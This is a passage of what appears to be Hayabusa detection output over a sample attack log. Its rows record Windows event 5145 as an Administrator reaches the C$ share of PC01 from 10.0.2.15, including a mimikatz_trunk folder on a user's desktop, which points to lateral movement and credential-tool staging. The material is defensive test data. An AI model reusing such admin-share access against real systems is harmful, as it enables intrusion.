Users\user02\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.589 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\mimikatz_trunk | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.589 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ 
| Path: Users\user02\Desktop\mimikatz_trunk\Win32 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.599 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\mimikatz_trunk\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.599 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.599 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.599 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.599 +00:00,PC01.example.corp,5145,info,Collect,Network 
Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.599 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.609 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.609 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.609 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Links | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.609 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.609 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.619 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.619 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.619 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user02\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.619 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.619 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.619 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.619 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.629 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: 
Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.629 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.629 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.629 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.629 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 
+2019-03-18 14:23:25.629 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.639 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.639 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.639 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.639 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Desktop | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.639 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.639 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.649 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.649 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.649 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ 
| Path: Users\user03\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.649 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.649 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.659 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.659 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.659 
+00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.659 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.659 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.659 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.659 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.669 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.669 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.669 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.669 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.669 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.679 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.679 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.679 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.679 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.679 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ 
| Share Path: \??\C:\ | Path: Users\user04\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.679 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.689 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.689 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.689 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.689 +00:00,PC01.example.corp,5145,info,Collect,Network 
Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.689 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.689 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.699 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.699 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
